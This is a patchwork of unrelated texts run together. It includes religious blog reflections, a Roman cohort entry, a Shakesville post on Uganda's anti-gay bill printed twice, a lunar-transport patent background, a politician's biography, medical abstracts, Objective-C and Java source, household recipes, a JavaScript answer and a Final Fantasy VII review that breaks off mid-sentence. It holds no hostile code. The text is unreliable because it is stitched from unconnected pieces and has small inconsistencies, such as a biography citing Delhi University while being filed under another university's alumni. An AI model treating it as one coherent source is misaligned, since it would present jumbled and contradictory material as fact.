are called to respond to the end approaching? I've studied Revelation, though not super recently, and I think the main point of the book is that there is an urgency to share the Good News. There is hope. We have a Savior. God is offering the hugest gift, that matters in times of war, and in times of blessing. Have we told everyone we know about the gift? Is that important to us? Tuesday, April 19, 2011 Our family has gotten to know a few kids over the last couple of years who come from very different homes than ours. They're growing up in such difficult circumstances. Missing Dads, stepdads in jail, Moms working the graveyard shift in factories, food stamps, months that start with lots of money and a kitchen full of food--ending with empty cupboards and no money. None for the $5 field trip, or for a pack of gum. I was watching kids make their way down to the bus stop this morning, and wondering how this happens, that in that big group, there can be such disparity. I recalled a heated conversation I had years ago in a college Sociology class about equal opportunity, and how that's one of the things that makes America great. The frustration comes when there may be equal opportunity, but there is not equal experience. Opportunities are there for these kids; they are getting educated, for example, but is it equal to what my kid standing at the same bus stop is getting? When my kid was a baby, I was reading to him, and singing the alphabet with him. I was doing all the things they recommended, feeding him well, sleeping him well, engaging with him. What about his friend? He grew up with drugs, and fighting, and I don't know what all.... So yes, he's getting a public education, but his starting point is so different. This is heartbreaking. Should I feel guilty about what we have? Maybe not, but I do, a little. Do others have less because of bad choices? Yes, probably, but whose choices? When did it start? Was there never an equal footing? So then I begin to wonder if this idea of "equal opportunity" is just another very Western concept, like "privacy," something we kind of think we have a right to, because of the culture we're in. I don't know. It got me asking what God thinks about equality? What does the Bible say about it? I did a very quick search of the word "equal" on Biblegateway.com (this is a great site, by the way) just to get an idea of how often and in what context the word shows up in the Bible. Here's what I found:There's lots of instructions, "divide these things equally..."; there's God asking Job and Isaiah, "Is there any equal to Me?...."; there's the Pharisees upset that Jesus would claim to be equal to God. Finally, there's a parable that caught my attention, about workers all getting paid an equal amount for unequal workloads. And Jesus ties that parable up with a bow in Matthew 20:16, saying, "So the last will be first and the first will be last." Hmmm. It's not completely satisfying to me, watching the kid at the bus stop with a not-warm-enough jacket. I mean big, eternal picture, yes, it is satisfying. It's a relief to know that God has this kid, He sees, He knows. But today, in the cold wind, not as much. The cold is temporary, I know, but it's also very real. The pain is real. The last "equal" on the list is in 2 Corinthians 8, where Paul is writing to the folks in Corinth about taking up a collection for the Lord's people. He is encouraging them to see their commitment through, to give willingly to those who need. Paul says it this way: Here is my advice: It would be good for you to finish what you started a year ago. Last year you were the first who wanted to give, and you were the first to begin doing it. Now you should finish what you started. Let the eagerness you showed in the beginning be matched now by your giving. Give in proportion to what you have. Whatever you give is acceptable if you give it eagerly. And give according to what you have, not what you don’t have. Of course, I don’t mean your giving should make life easy for others and hard for yourselves. I only mean that there should be some equality. Right now you have plenty and can help those who are in need. Later, they will have plenty and can share with you when you need it. In this way, things will be equal. As the Scriptures say,“Those who gathered a lot had nothing left over, and those who gathered only a little had enough.” (2 Corinthians 8:10-15, NLT) The Scriptures that Paul is quoting are from Exodus, when God provided manna to the Israelites in the wilderness. Remember that story? No one was able to collect more than they needed, and no one was lacking. There, in the desert, there was real equality, because God provided it. But in the New Testament, and today, there are some with lots, and some with little. And God does provide today, through us. So I will feed these kids when they're here at my house, and I will try to help them know they are valued and loved. And this is where faith comes in, I have to trust that while I do the bit that I can, God is working in the mighty, big-picture, eternal way that I cannot. Wednesday, January 26, 2011 While out for breakfast with friends the other morning, we got to talking about the idea that people everywhere are searching for God. That's why we have so many different religions and beliefs out there; we were made to search for something bigger and greater than us, and while all paths do not necessarily lead to the One God, all paths are trying to find a god. I'm not an expert of world religions, as a matter of fact, I understand very little about other faiths. I get a little twitchy when it comes to discussions of other religions, partly because of my lack of knowledge. But also because while I want to be loving, I really can't embrace the whole you-do-it-your-way-and-I'll-do-it-my-way thing, since Jesus says He is the ONLY way. Either I believe that's true, or I don't. And if I believe that's true, by gum, I have an obligation to tell you so that you don't miss out. But in telling others, I can step indelicately, hurt feelings, and come off decidedly un-Jesuslike. The one thing I do know that makes Christianity different, is that while we're all searching and thinking that we're finding a god, only the LORD--the God of Abraham, Isaac and Jacob--desires to be in relationship with us. He actually pursues us. I said as much that day at breakfast, and have been mulling that thought over ever since. Then this morning in my homework for a study I'm doing on the book of Jonah, I was reminded of three parables Jesus told to illustrate that while we're seeking, or even when we aren't seeking Him, He loves us and wants us to be in relationship with Him. It's amazing! In one chapter of Luke, Jesus tells these three stories to a gathering of all kinds of people. Tax collectors, sinner-types, and religious leaders and scholars, so we know these stories are meant for all of us to hear. Check it out: Luke 15Parable of the Lost SheepTax collectors and other notorious sinners often came to listen to Jesus teach. This made the Pharisees and teachers of religious law complain that he was associating with such sinful people—even eating with them!So Jesus told them this story: “If a man has a hundred sheep and one of them gets lost, what will he do? Won’t he leave the ninety-nine others in the wilderness and go to search for the one that is lost until he finds it? And when he has found it, he will joyfully carry it home on his shoulders. When he arrives, he will call together his friends and neighbors, saying, ‘Rejoice with me because I have found my lost sheep.’ In the same way, there is more joy in heaven over one lost sinner who repents and returns to God than over ninety-nine others who are righteous and haven’t strayed away! Parable of the Lost Coin “Or suppose a woman has ten silver coins and loses one. Won’t she light a lamp and sweep the entire house and search carefully until she finds it? And when she finds it, she will call in her friends and neighbors and say, ‘Rejoice with me because I have found my lost coin.’ In the same way, there is joy in the presence of God’s angels when even one sinner repents.” Parable of the Lost SonTo illustrate the point further, Jesus told them this story: “A man had two sons. The younger son told his father, ‘I want my share of your estate now before you die.’ So his father agreed to divide his wealth between his sons. “A few days later this younger son packed all his belongings and moved to a distant land, and there he wasted all his money in wild living. About the time his money ran out, a great famine swept over the land, and he began to starve. He persuaded a local farmer to hire him, and the man sent him into his fields to feed the pigs. The young man became so hungry that even the pods he was feeding the pigs looked good to him. But no one gave him anything. “When he finally came to his senses, he said to himself, ‘At home even the hired servants have food enough to spare, and here I am dying of hunger! I will go home to my father and say, “Father, I have sinned against both heaven and you, and I am no longer worthy of being called your son. Please take me on as a hired servant.”’ “So he returned home to his father. And while he was still a long way off, his father saw him coming. Filled with love and compassion, he ran to his son, embraced him, and kissed him. His son said to him, ‘Father, I have sinned against both heaven and you, and I am no longer worthy of being called your son.’ “But his father said to the servants, ‘Quick! Bring the finest robe in the house and put it on him. Get a ring for his finger and sandals for his feet. And kill the calf we have been fattening. We must celebrate with a feast, for this son of mine was dead and has now returned to life. He was lost, but now he is found.’ So the party began. “Meanwhile, the older son was in the fields working. When he returned home, he heard music and dancing in the house, and he asked one of the servants what was going on. ‘Your brother is back,’ he was told, ‘and your father has killed the fattened calf. We are celebrating because of his safe return.’ “The older brother was angry and wouldn’t go in. His father came out and begged him, but he replied, ‘All these years I’ve slaved for you and never once refused to do a single thing you told me to. And in all that time you never gave me even one young goat for a feast with my friends. Yet when this son of yours comes back after squandering your money on prostitutes, you celebrate by killing the fattened calf!’ “His father said to him, ‘Look, dear son, you have always stayed by me, and everything I have is yours. We had to celebrate this happy day. For your brother was dead and has come back to life! He was lost, but now he is found!’” I'm grateful for the lesson this morning in my study, because it's a reminder that in following Christ, I do find God, THE God who has been searching for me, and throws a party every time one of the lost ones makes their way to Him.
Cohors III Alpinorum equitata Cohors tertia Alpinorum equitata ("3rd part-mounted Cohort of Alpini") was a Roman auxiliary mixed infantry and cavalry regiment. Alpini was a generic name denoting several Celtic-speaking mountain tribes inhabiting the Alps between Italy and Gaul, which were organised as the Tres Alpes provinces. The regiment was probably raised as one of 4-6 Alpini units recruited after the final annexation of the western Alpine regions by emperor Augustus in 15 BC. It first appears in the datable epigraphic record in Dalmatia in 75 AD. It was still in Dalmatia in 93. It probably remained there for the whole of the 2nd century and moved to Pannonia in the early 3rd century. However, in the absence of datable inscriptions, movements after 93 are speculative. The regiment's inscriptions have been found at the following Roman forts (in likely order of occupation): Humac; Burnum; Salona; Muć; Baratsföldpuszta (Pannonia). The names of 5 praefecti (regimental commanders) are preserved. None has a certain origin. 4 centuriones (infantry officers) and 2 decuriones (cavalry officers) are recorded, although only one has a certain origin (Celeia, Slovenia). Junior officers attested are a signifer (standard-bearer), tesserarius (watch officer) and a tubicen (trumpeter). Of these only the tubicen s origin is known: the Caturiges, a tribe in the Gallic Alps. The names of 13 caligati (common soldiers) are extant. One is of the Bodionti, probably a Gallic tribe. Another is from the Alpes Maritimae province, where the regiment was originally (partially) recruited. Citations References Holder, Paul Studies in the Auxilia of the Roman Army (1980) Spaul, John COHORS 2 (2000) See also Roman auxiliaries List of Roman auxiliary regiments Category:Military of ancient Rome Category:Auxiliary equitata units of ancient Rome
Under current Ugandan law, homosexuality is a crime punishable by life in prison. The proposed law would not just condemn HIV positive gay men and "repeat offenders" to death, it would also jail for three years anyone who knows a gay man but refuses to report them to authorities. Further, anyone who defends in public the rights of gays and lesbians would be subjected to a seven year prison term. Shaker Linkmeister mentioned in comments that Jeff Sharlet, author of The Family: The Secret Fundamentalism at the Heart of American Power—a recent book on the secretive fundamentalist organization of which many Congresspeople are members and which has been associated with a number of recent Congressional sex scandals (see more here, here, and here)—had been on NPR's "Fresh Air" and reported that the legislation was sponsored by a member of The Family. "[The] legislator that introduced the bill, a guy named David Bahati, is a member of The Family," he said. "He appears to be a core member of The Family. He works, he organizes their Ugandan National Prayer Breakfast and oversees a African sort of student leadership program designed to create future leaders for Africa, into which The Family has poured millions of dollars working through a very convoluted chain of linkages passing the money over to Uganda." And how did Sharlet discover the connection? "You follow [the] money," he said. You look at their archives. You do interviews where you can. It's not so invisible anymore. So that's how working with some research colleagues we discovered that David Bahati, the man behind this legislation, is really deeply, deeply involved in The Family's work in Uganda, that the ethics minister of Uganda, Museveni's kind of right-hand man, a guy named Nsaba Buturo, is also helping to organize The Family's National Prayer Breakfast. And here's a guy who has been the main force for this Anti-Homosexuality Act in Uganda's executive office and has been very vocal about what he's doing, in a rather extreme and hateful way. But these guys are not so much under the influence of The Family. They are, in Uganda, The Family." You know, one of the things that strikes me about "The Family" is that they're the very thing conservative Christians have always accuse Jews of being—some shadowy religious organization that tries to control governments in other countries. It's just like how that same flavor of Christian schemes to convert children by rewarding kids who bring friends to church and targeting the youth market with Christian wrestling and Christian rock concerts and Christian extreme sporting events, but they incessantly accuse gays and feminists of child recruitment. Projection, projection, projection. When you want to find out what they're doing, just consider what they're accusing us of doing. [H/T to Shaker David.] Shakesville is run as a safe space. First-time commenters: Please read Shakesville's Commenting Policy and Feminism 101 Section before commenting. We also do lots of in-thread moderation, so we ask that everyone read the entirety of any thread before commenting, to ensure compliance with any in-thread moderation. Thank you. Under current Ugandan law, homosexuality is a crime punishable by life in prison. The proposed law would not just condemn HIV positive gay men and "repeat offenders" to death, it would also jail for three years anyone who knows a gay man but refuses to report them to authorities. Further, anyone who defends in public the rights of gays and lesbians would be subjected to a seven year prison term. Shaker Linkmeister mentioned in comments that Jeff Sharlet, author of The Family: The Secret Fundamentalism at the Heart of American Power—a recent book on the secretive fundamentalist organization of which many Congresspeople are members and which has been associated with a number of recent Congressional sex scandals (see more here, here, and here)—had been on NPR's "Fresh Air" and reported that the legislation was sponsored by a member of The Family. "[The] legislator that introduced the bill, a guy named David Bahati, is a member of The Family," he said. "He appears to be a core member of The Family. He works, he organizes their Ugandan National Prayer Breakfast and oversees a African sort of student leadership program designed to create future leaders for Africa, into which The Family has poured millions of dollars working through a very convoluted chain of linkages passing the money over to Uganda." And how did Sharlet discover the connection? "You follow [the] money," he said. You look at their archives. You do interviews where you can. It's not so invisible anymore. So that's how working with some research colleagues we discovered that David Bahati, the man behind this legislation, is really deeply, deeply involved in The Family's work in Uganda, that the ethics minister of Uganda, Museveni's kind of right-hand man, a guy named Nsaba Buturo, is also helping to organize The Family's National Prayer Breakfast. And here's a guy who has been the main force for this Anti-Homosexuality Act in Uganda's executive office and has been very vocal about what he's doing, in a rather extreme and hateful way. But these guys are not so much under the influence of The Family. They are, in Uganda, The Family." You know, one of the things that strikes me about "The Family" is that they're the very thing conservative Christians have always accuse Jews of being—some shadowy religious organization that tries to control governments in other countries. It's just like how that same flavor of Christian schemes to convert children by rewarding kids who bring friends to church and targeting the youth market with Christian wrestling and Christian rock concerts and Christian extreme sporting events, but they incessantly accuse gays and feminists of child recruitment. Projection, projection, projection. When you want to find out what they're doing, just consider what they're accusing us of doing. Welcome to Shakesville Welcome to Shakesville, a progressive feminist blog about politics, culture, social justice, cute things, and all that is in between. Please note that the commenting policy and the Feminism 101 section, conveniently linked at the top of the page, are required reading before commenting.
Resource recovery operations on Earth require an economic feasibility with a financial return on the invested capital. The cost of transporting payloads to and from the moon is a barrier to economic development of the moon. Rocket propelled space vehicles transporting cargo outside the proximity of the Earth in airless space do not require the same vehicle hardware to push up through the atmosphere or land on the moon, but discarding the vehicle hardware on each mission like Apollo is still expensive. The space exploration initiative announced by President Bush and implemented by NASA has the opportunity to mature the transportation cycles beyond the Earth and the moon. The requirements and cost for each of these six lunar transportation cycles is different and the requirements for manned versus unmanned missions differs greatly. If one breaks out these different cycle or leg transportation requirements for each portion of a lunar trip, then six distinct transportation cycles emerge. As each cycle matures, it becomes more effective and efficient Commerce competitive forces help accelerate this maturing process and the evolution into a cost competitive transportation environment. The transportation cycles emerging are Earth to low Earth orbit or LEO, LEO to Lunar orbit “LO,” LO to the lunar surface, the lunar surface back to LO, LO to LEO and the re-entry from LEO to the Earth's surface. Placing a transportation node between each of the separate cycles would accelerate the maturing of the transportation process and facilitate introducing commerce. In a mature transportation cycles on Earth, we find that changing the requirements for a portion of a trip, like from water to land results in the change of a vehicle and results in a harbor emerging. Why not fly and eliminate the harbor? Well, people fly, eliminate the harbor and pay the extra cost, but most cargo goes a different less expensive route through the harbor. The airport becomes the transportation node for humans and the harbor is for cargo with very different costs related to transportation. Aircraft manufacturers want all humans and cargo to fly, but when paying for the transportation, the cost competitive aspects become important. In a remote site like the moon, the ratio of humans to cargo is significantly skewed. In looking at similar remote locations on Earth the ratio is less than 1% human and 99% cargo. To combine the manned and unmanned portions as we did in Apollo makes space transportation expensive, in part, because the safety and reliability of manned space flight is expensive. Such manned vehicles may be similar to the Saturn vehicle of the Apollo project, which landed the first man on the moon more than 30 years ago. The next series of exploration trips to the moon might consider separating unmanned cargo from humans in some manner consistent with safety. Rendezvousing, docking and transferring payloads between space vehicles was performed more than forty years ago in the Apollo program, and more recently between shuttles and the International Space Station. The Apollo program used a form of transportation node, for example, the astronauts had to transfer cargo from the lunar lander to the command module in lunar orbit. The command module in lunar orbit was a node in the transportation system and saved mass from being transported to and from the moon's surface. Today these transportation node techniques and procedures can be refined and used, for example, between each of the six transportation cycles and two of the nodes already exist, the Spaceports on Earth and the International Space Station. Travel between them has become partly commercial and will become competitive. In such conventional systems, the actual transfer of cargo is performed by people after docking of the vehicles and opening of a hatch, However, the automatic transfer of cargo between two vehicles in space, such as unmanned space vehicles, is a more complex operation, but possible by combining innovation with conventional systems. The enhancement of the transportation process to be more effective and more affordable can also happen. U.S. Patent Application Publication No. 2002/0079407 to Lounge et al. entitled, “Underway replenishment system for space vehicles” discloses a replenishment system used to deliver payloads and supplies to an orbiting receiving space vehicle using a tether. The 2002/0079407 application does not enhance the payload movement. The 2002/0079407 application discloses a method of transferring payloads between a delivering space vehicle and a receiving space vehicle, but falls short of a transportation node. U.S. Pat. No. 4,790,499, to Taylor, et at, describes docking with an orbital object using a tether. Docking with an object at the end of a cable is less likely to damage the orbital facility because both objects can move in rendezvous and docking operations. The '499 patent discloses a passive operations with no mention of active “seeker” tether tip operations.
Eken Riba Eken Riba is a former Minister of State for Law, Justice & Cooperation of the Indian State of Arunachal Pradesh. He was elected to Basar Constituency in the year 1999-2004. He is also the first person to become a Lawyer from the state of Arunachal Pradesh. He is currently one of 4 State Information Commissioners for the Government of Arunachal Pradesh since January 2014. He is also a recipient of the prestigious Bharat Excellence Award. Though a Law graduate, most of his life has been in public field comprising General Secretary of his school,General Secretary of Students Union, Political Secretary and Minister of State spanning over half a decade. His first steps into public field was in 1966 when he was elected to the post of General Secretary for his School at Aalo when he was in class 10. The following year he was re-elected. Though a bright student all his life, he failed class 12 examination in 1969 due to over engagement into public field. He reappeared the following year and passed the examination. In 1971 he was elected for the post of General Secretary of NEFA Students Union. He was also chosen as the General Secretary for Jawaharlal Nehru College at Pasighat in Arunachal Pradesh. In 1973 the NEFA Students Union ceased to exist and hence he was its last General Secretary. In 1973 he became the President of his college. He passed from JN College in 1973 with B.A. (hons). In 1974-75 he became the first President of the All Arunachal Pradesh Students Union or AAPSU. From 1975-77 he studied at Delhi University (DU) Jubilee Hall and passed out in llb in Law. He practiced Law at Delhi for several months after which he went to Guwahati High Court to practice the same. He first propagated for the regional political party of Arunachal Pradesh, the People's Party of Arunachal or PPA. Later he joined the national party of India, the Congress Party. In 1999 he was elected to Basar Constituency and became the Minister of State for Law,Justice & Cooperation in the Government of Arunachal Pradesh. In 2009 he was appointed an Advisor to the Chief Minister of Arunachal, the late Dorjee Khandu. Since January 2014, he is one of 4 State Information Commissioners for the Government of Arunachal Pradesh. References Category:Living people Category:Arunachal Pradesh politicians Category:Jawaharlal Nehru University alumni Category:Year of birth missing (living people) Category:Place of birth missing (living people)
Leaflet escape in a TRI bileaflet rotatable mitral valve. Acute prosthetic valve dysfunction is a critical condition for any patient, and is associated with a high mortality. A 24-year-old man who had undergone mitral valve replacement with a TRI bileaflet valve four months previously at another center was admitted with acute-onset left ventricular failure. Echocardiography showed massive mitral insufficiency which was suggestive of a stuck valve. Emergency surgery was carried out, at which the cranial leaflet was found to be stuck open. There was no tissue impingement and thrombosis, the caudal leaflet was absent, and there were no signs of endocarditis or pannus formation. The TRI valve was removed and a replacement 25 mm bileaflet mechanical valve inserted. The embolized leaflet was found in the terminal aorta, but the patient died on day 66 after surgery due to sepsis which had developed from aspiration pneumonia. This is the first report of leaflet escape and terminal aortic embolization with the TRI bileaflet rotatable mitral valve. Acute deterioration of a patient with a prosthetic heart valve should suggest valve dysfunction for which appropriate treatment is rapid relief of the failing left ventricle and replacement of the defective valve with a functioning prosthesis.
// // DetailedCount.h // FxSqLite // // Created by Makara Khloth on 9/1/11. // Copyright 2011 __MyCompanyName__. All rights reserved. // #import <Foundation/Foundation.h> @interface DetailedCount : NSObject { @private NSInteger inCount; NSInteger outCount; NSInteger missedCount; NSInteger unknownCount; NSInteger localIMCount; NSInteger totalCount; } @property (nonatomic, assign) NSInteger inCount; @property (nonatomic, assign) NSInteger outCount; @property (nonatomic, assign) NSInteger missedCount; @property (nonatomic, assign) NSInteger unknownCount; @property (nonatomic, assign) NSInteger localIMCount; @property (nonatomic, assign) NSInteger totalCount; - (id) init; - (id) initWithData: (NSData *) aData; - (NSData *) transformToData; @end
However, the exact limit of ABV to consider a drink a session beer is up for debate. “Different people have different personal definitions,” says Cameron Read, general manager of The Greenville Beer Exchange. “Almost every beer culture has its own kind of idea of a session beer, though they might call it something different.” What is for certain, Read says, is that the British and Americans have a different standard. The session term originated in England, where beers were consumed in “sessions” at the pub, and low ABV drinks were considered an alternative to water. You could call it a conversational, social beer. And not necessarily a lighter seasonal beer, Read says, as a low ABV nut brown ale could be enjoyed by a wintertime fire. In England, the widely accepted ABV limit for a beer to be termed session is 4 percent or below, Read says. Americans, however, have adopted the term in our way — and, in American fashion, by our own definition. Session beers in America are generally defined somewhere between 4.5 and 5 percent, as beers with much lower ABV aren’t as easy to find. Even that isn’t a bright line: Full Sail named its session beer simply “Session.” The ABV is 5.1 percent. Of course, you could call an American beer “sessionable.” A fair compromise for the craft beer purist? Perhaps. Then there’s the so-called “lawnmower” beer — less conversation, more relief by yourself after a hot day mowing the lawn. It also has been called the “poolside beer,” Thomas Creek assistant brewer Zach Newton says. “That’s more of an old-fart terminology,” Newton says. “You might hear that floating around among a few of the cotton tops still around the industry. It’s a hot day. You want something more hydrating than inebriating.”
//CHECKSTYLE:OFF package hudson.plugins.tfs.model; import hudson.model.Job; import hudson.model.Result; import hudson.model.Run; import jenkins.model.Jenkins; import net.sf.json.JSONObject; import org.apache.commons.lang.StringUtils; import javax.annotation.Nonnull; import java.util.Collections; import java.util.HashMap; import java.util.Map; public class TeamGitStatus { private static final Map<Result, GitStatusState> RESULT_TO_STATE; static { final Map<Result, GitStatusState> resultToStatus = new HashMap<Result, GitStatusState>(); resultToStatus.put(Result.SUCCESS, GitStatusState.Succeeded); resultToStatus.put(Result.UNSTABLE, GitStatusState.Failed); resultToStatus.put(Result.FAILURE, GitStatusState.Failed); resultToStatus.put(Result.NOT_BUILT, GitStatusState.Error); resultToStatus.put(Result.ABORTED, GitStatusState.Error); RESULT_TO_STATE = Collections.unmodifiableMap(resultToStatus); } public GitStatusState state; public String description; public String targetUrl; public GitStatusContext context; public static TeamGitStatus fromRun(@Nonnull final Run<?, ?> run) { final TeamGitStatus status = new TeamGitStatus(); final Result result = run.getResult(); if (result == null) { status.state = GitStatusState.Pending; status.description = status.state.toString(); } else { status.state = RESULT_TO_STATE.get(result); status.description = result.toString(); } final Job<?, ?> job = run.getParent(); status.description = job.getDisplayName() + run.getDisplayName() + ": " + status.description; status.targetUrl = run.getAbsoluteUrl(); status.context = getStatusContext(job); return status; } public static TeamGitStatus fromJob(@Nonnull final Job job) { final TeamGitStatus status = new TeamGitStatus(); status.state = GitStatusState.Pending; status.description = "Jenkins Job " + job.getDisplayName() + " queued"; status.targetUrl = job.getAbsoluteUrl(); status.context = getStatusContext(job); return status; } private static GitStatusContext getStatusContext(@Nonnull final Job job) { final String instanceUrl = StringUtils.stripEnd(Jenkins.getInstance().getRootUrl(), "/"); final String projectDisplayName = job.getParent().getFullName() + "/" + job.getDisplayName(); return new GitStatusContext(projectDisplayName, instanceUrl); } public String toJson() { final JSONObject jsonObject = JSONObject.fromObject(this); final String result = jsonObject.toString(); return result; } }
Mesenchymal chondrosarcoma--a case report with an ultrastructural study and review of Japanese literatures. A case of mesenchymal chondrosarcoma occurring in the left maxilla of a 30-year-old Japanese male was reported. Electron microscopic observation confirmed transition of undifferentiated cells to chondrocytes and calcification in similar manner as previously described with physiological processes. Matrix vesicles were thought to be the cytoplasmic products of tumor chondrocytes. Electron-dense finely granular deposits resembling the organic matrix of cartilagenous calcification were seen within the intercellular matrix. Matrix vesicles were also closely related to these deposits. Japanese cases of this rare tumor were reviewed and 8 cases, including the present case as 6th among them, were accepted. Clinical characteristics were similar to those of a series reported by SALVADOR et al.
Providing a query to a search engine on a network, such as the Internet, often results in large numbers of search results being returned to the user, each reference presumably having information determined to be relevant to the search query. Unfortunately, there is no easy way for a user receiving such search results to know what is really of interest to him/her without reviewing the informational content of most, if not all, the search results returned to him/her. However, such a review is at least burdensome if not physically impossible in cases where an extremely large number of search results (e.g., 2,000 to 100,000 or more) are provided to the user. Accordingly, the user has the option of spending a substantial amount of time reviewing the search results, and/or reviewing only portions of the search results and hoping that the information he/she desires occurs in the search results reviewed. Accordingly, it would be desirable to have a capability for the user to obtain such search results in an order that puts the results of more likely interest or importance to the user toward the front/top of the list of returned search results, and/or puts the results of less likely interest or importance to the user toward the end of the list of returned search results. More particularly, it would be desirable to use information indicative of past user interests (and/or the interests of other users “similar” to the user) to order the user's subsequent search results so that the results more likely to be of interest to the user are presented first.
Post navigation THE MIXTURE THAT WILL MAKE YOUR HOME SMELL SO WONDERFUL… YOUR NEIGHBORS WILL ENVY YOU There is not anything more pleasant that a house with a wonderful fragrance all around. Even though many people are not aware of it, odor affects our mood. Therefore, if you want to relax, your home should have an abundant fragrance. Nevertheless, if the odor in our home is unpleasant and strong, it will make us feel uncomfortable. Unluckily, we cannot always have a wonderful fragrance in our homes. For example, after chopping onion we cannot get rid of the unpleasant odor in any way. In order to eliminate the odor, most housewives buy air fresheners, which only hide the odor. But when their effect goes away, the odor reappears. Fortunately, in this article, we are going to show you how to make a natural flavoring, which is more effective than air fresheners. You spray your home with it and the pleasant smell will remain for a long period of time. Even your guests will love it. It is really easy to prepare it and the ingredients necessary for this flavoring are not expensive. Follow the instructions below to prepare it in the right way. A NATURAL FLAVORING RECIPE – You will need these ingredients: • One spray bottle • One tablespoon of baking soda • Three cups of lukewarm water • Three tablespoons of fabric softener Preparation method and use: • Put the three tablespoons of fabric softener in the spray bottle. • After that, add the three cups of lukewarm water in the bottle. • Finally, add one tablespoon of baking soda and close the bottle. • Shake the bottle well until the ingredients are mixed. • Spray the mixture all over your house. Except this natural flavoring, there are other home-made products which you can use to refresh your home. In addition, we are going to show you how to prepare a home-made fabric softener, so that you can save money. With this fabric softener, your clothes wil have a unique aroma. It is really important that the plastic container is large. If the container is small, the fabric softener grows and you will spit it out of the container. • Pour the hot water in the plastic container. • Add the apple cedar vinegar and the baking soda. The chemical reaction will create bubbles, but do not worry, it is normal. • When the bubbles go away, put the mixture into an empty bottle of fabric softener. • Add a few drops of essential oil. • Finally, stir it and store it on a dark, cool place. You can use this natural softener by adding it in washing machine or in the soaking clothes. In fact, you use it in the same way as the commercial clothe softeners. This fabric softener will make you clothes keep the fragrance for a long period of time. You can prepare these natural products instead of buying commercial one, which full of chemicals. You will be impressed when you try them? Which one would you try first?
A LAKE MINNETONKA SETTING LIKE NO OTHER! $ 3,490,000 Grandview Point in Cottagewood. 192 feet of crystal clear sandy lakefront. Incredible views over lower Lake Minnetonka. Main level quality finishes are 2nd to none! Come be part of the lower level's final selections. It's a lifestyle, come feel it.
Q: how can I assign object properties to dynamic elements based on the modulus operator I have created a mini template that holds and <h2> & <h3>, I have created a loop that adds .inner everytime i%2 === 0, what i would like to do is split up the data being outputted to follow the same kind of rule so when i%2 === 0 add .inner and also split the object properties so each .inner should display 2 templated object properties. Can anyone advise on how this can be achieved? Also my templated items seem to return undefined? Demo here http://jsbin.com/otirax/13/edit A: Your code can be improved in many ways. The selector here: $('.inner').append(temp); should actually be $(".inner:last"), otherwise it affects all ".inner" objects created so far. Better yet, save a newly created div in a variable: inner = $('<div class="inner"></div>').appendTo($('#ctn')); and then simply use the var, thus saving an expensive selector operation: inner.append(...); Another improvement is to automate template rendering. Consider the following function: it populates arbitrary {{tags}} from an object: function render(template, values) { return template.replace( /{{(\w+)}}/g, function($0, $1) { return values[$1] }); } Complete example: http://jsbin.com/iviziz/2/edit . Let us know if you have questions.
About Personal Story Films Owner, Producer: Lisa Pontoppidan Beginnings The idea for this venture began as I was making a documentary about my father, Henning Pontoppidan. I found a deep sense of purpose as I was recording his stories, collecting old photos, and choosing music that is meaningful to him. I realized that the finished film would be watched by not only my generation - sisters, cousins, those he had taught - but also by his grandchildren, as well as those young doctors who honor his seminal work in critical care medicine and want to learn more about him as a person. His full personality comes through, with his dry sense of humor, love of nature, forests and sailing, his knack for building and woodworking, and his steadfastness as a husband, father, and grandfather. I know when he is gone we will watch it over and over with tears and laughter and gratitude for the gift of his presence in our lives. And this is what I want to give to other families - a lasting and rich legacy that they can pass on to their own children, the history of a unique ancestor brought to life in the way that only film can do. My Background Personal Story Films is owned and operated by myself, Lisa Pontoppidan. I earned a BA in Television Production in 1982, and went on to work as a videotape editor for news and documentaries at the local Public Television Station, WGBH-TV. While I was there, a series of documentaries I edited about private violence was nominated for an Emmy. Since then,I have directed and produced many documentaries and short videos on various topics. I have also taught video production classes at Adult Education and in conjunction with the English Language Program at Boston University. In addition to this work, I also write and perform music, create collages, and make art from nature. I sometimes hire people in the film/video field to help me with set up and camera work. I make sure that each individual I hire is a kind, capable, interested, and considerate person. The values that I bring to this work Kindness, respect, and professionalism are the biggest values I carry into my work and every interaction I have with others. I am by nature kind, interested, and respectful when I talk with and interview people.I honor the integrity of each human being and each story. I work with individuals and families to create the film that most clearly expresses their personality, experiences and values. I leave room for client feedback, and take it into account to whatever degree I can. I believe the process of making the film together should be meaningful and enjoyable for everyone. I bring all of my skills and talent to bear in making the finished film in a timely way, and can't tolerate doing less than my best. Equipment We use a new high definition camera, the Canon XC15. It has automatic as well as manual focus controls, a 1" high definition sensor, a 10x optical zoom lens, and 2 XLR inputs which allow for the best audio quality. It is capable of recording at 4K (extremely high definition). For sound, we use Zoom and Sennheiser microphones, known to be of the highest quality. For editing, we have the latest version of Final Cut Pro X, one of the top choices for professional editors. Call 617-942-1875 Our home base is in Boston, and we primarily serve the New England area. However, we are willing to travel further for some projects. We look forward to hearing from you!
"A Detailed Look at Final Fantasy VII's Staying Power" First of all, this review is not spoiler-free. Final Fantasy VII has been out for 11 years and is still retaining a huge amount of popularity, and this review is an analysis of why it's been so enduring. If you somehow haven't played it, don't read this review. A review on Final Fantasy VII? Why, that's so original! Why haven't 120 other people already posted reviews on Final Fantasy VII on GameFAQs? But this particular review is different. Now, 11 years later, Final Fantasy VII has proven that it has withstood the tests of time. To date, it's still played by thousands of people all around the world every year, it has inspired countless spin-offs, and its characters are consistently rated as among the most popular characters of all-time, alongside the likes of Mario and Link, who had dozens of games to build their popularity. I, personally, first played Final Fantasy VII 7 years ago. It was my first RPG, and to date, it is not my favorite - that title goes to Final Fantasy 9. Yet, on a seemingly yearly basis, I get the urge to play Final Fantasy VII again. Just now I completed my 7th play-through, following a run through the prequel, Crisis Core. 7 years since I first played, and this my 7th play-through of Final Fantasy 7. Sensing a pattern? But with all my previous experience, the answer to one question eluded me: why is Final Fantasy VII so popular, so lasting, so transcendent? Why do so many people still brush aside the Popeye-like character models and visit the world of Midgar and materia once more, 11 years after its creation? Some people have proposed simple ideas for this. Final Fantasy VII was the first big-budget RPG in 3D. And because of that, Final Fantasy VII was many gamers' first RPG, and so it has a special place in their hearts. Simple, right? That's not good enough for me. I don't believe for a second that Final Fantasy VII succeeded and lasted so long solely because it came along at the right time, on the right console, with then-cutting edge graphics. Sure, it revolutionized the RPG industry, but if it hadn't, some other game would. But in order to achieve the downright transcendent level of popularity that Final Fantasy VII has tapped, it simply had to be more than that. So, with that in mind, I set out on my 7th run-through of Final Fantasy VII, keeping a special eye for things that I believe set Final Fantasy VII apart - aspects that games before it didn't do, and aspects that games after it haven't done since - a list of reasons why Final Fantasy VII is Final Fantasy VII. And my results? I've found twelve things (I know, you were expecting seven) that I feel set Final Fantasy VII apart. Some are 